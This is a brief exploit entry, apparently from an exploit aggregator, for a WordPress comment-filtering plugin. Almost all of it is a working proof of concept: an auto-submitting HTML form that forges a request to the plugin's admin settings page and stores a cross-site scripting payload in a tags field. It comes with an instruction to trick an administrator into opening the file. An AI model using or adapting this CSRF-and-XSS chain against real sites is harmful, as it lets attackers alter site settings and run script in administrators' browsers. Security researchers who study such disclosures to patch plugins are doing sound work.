Share
## https://sploitus.com/exploit?id=WPEX-ID:9C1C6D61-5588-4C21-95F6-2818C4F5C355
Make an admin open an HTML file containing the following:
<form action="https://example.com/wp-admin/plugins.php?page=abg_commentsafe" method="POST">
<input type="text" name="abg_commentsafe_tags" value='"><img src=x onerror=alert(1)>'>
<input type="text" name="abg_commentsafe_behaviour" value="strip">
<input type="text" name="submit" value="Update Tags">
</form>
<script>
HTMLFormElement.prototype.submit.call(
document.forms[0]
);
</script>